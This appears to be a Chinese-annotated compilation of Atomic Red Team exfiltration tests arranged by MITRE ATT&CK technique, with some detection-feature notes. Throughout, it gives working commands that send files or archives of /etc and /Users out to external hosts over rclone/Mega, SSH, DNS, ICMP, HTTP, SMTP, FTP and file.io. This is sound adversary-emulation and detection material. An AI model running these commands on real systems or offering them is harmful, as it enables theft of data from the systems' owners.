Atomic-渗漏(Exfiltration)
T1567.002
Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1048
Exfiltration Over Alternative Protocol
T1048.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
T1048.002
Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1041
Exfiltration Over C2 Channel
T1030
Data Transfer Size Limits
T1020
Automated Exfiltration
1567.002
Exfiltrate data with rclone to cloud Storage - Mega (Windows)
New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd #{rclone_path}
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v
提取特征:rclone. exe
T1048
Exfiltration Over Alternative Protocol
-
Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
-
Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol - SSH
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Exfiltration Over Alternative Protocol - SSH
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
DNSExfiltration (doh)
Import-Module #{ps_module}
Invoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
提取特征:Invoke-DNSExfiltrator
T1048.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
-
Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
-
Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
-
Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
-
Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
-
Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
-
Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
Exfiltration Over Alternative Protocol - HTTP
#### Run it with these steps!
1. Victim System Configuration:
mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
2. Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337
3. To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
Exfiltration Over Alternative Protocol - ICMP
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
Exfiltration Over Alternative Protocol - DNS
#### Run it with these steps!
1. On the adversary machine run the below command.
tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
2. On the victim machine run the below commands.
xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
3. Once the data is received, use the below command to recover the data.
cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
Exfiltration Over Alternative Protocol - HTTP
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
Exfiltration Over Alternative Protocol - SMTP
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
MAZE FTP Upload
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
Exfiltration Over Alternative Protocol - FTP - Rclone
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
Python3 http. server
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
T1048.002
Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data HTTPS using curl windows
#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
Exfiltrate data HTTPS using curl linux
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
T1041
Exfiltration Over C2 Channel
C2 Data Exfiltration
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
T1030
Data Transfer Size Limits
Data Transfer Size Limits
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
T1020
Automated Exfiltration
IcedID Botnet HTTP PUT
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}